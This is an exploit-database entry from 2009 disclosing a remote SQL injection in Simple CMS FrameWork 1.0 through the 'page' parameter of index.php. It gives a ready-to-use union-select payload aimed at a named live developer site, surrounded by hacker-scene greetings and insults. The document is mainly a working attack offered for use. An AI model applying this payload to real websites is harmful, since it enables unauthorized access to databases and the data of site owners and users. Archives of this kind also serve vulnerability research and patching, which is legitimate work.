id: 5699
date: 08/25/2009
title: Simple CMS FrameWork <= 1.0 (page) Remote SQL Injection Vuln
author: Red-D3v1L
cves: 

============================================================
Simple CMS FrameWork <= 1.0 (page) Remote SQL Injection Vuln
============================================================



==============================================================================
        [»] ~ Note : Hacker R0x Lamerz Sux !
==============================================================================
        [»]  Simple CMS FrameWork <== 1.0 Remote SQL Injection Vulnerability
==============================================================================
    [»] my home:             [ Hackteach.org ]
    [»] Script:              [ Simple CMS FrameWork ]
    [»] Language:            [ PHP ]
    [»] Home:                [ http://westlingit.com/cms.php ]
    [»] Gr44tz to:           [ All member Hackteach.org/cc - Str0ke - sp3x ]
    [»] Fuck To :            [ Anti-trust << Big Big Big Lamer << ]
########################################################################

===[ Exploit SQL ]===  

 [»] [Path]/index.php?id=null&page=[SQL]

 [»] L1v3 d3m0 : 

http://dev.westlingit.com/simplecms/index.php?id=null&page=-0+union+select+1,2,3,4,5,6,version(),8,9,10,11,12,13,14,15,16,17,18,19 


###########################################################################




#  0day.today [2023-03-26]  #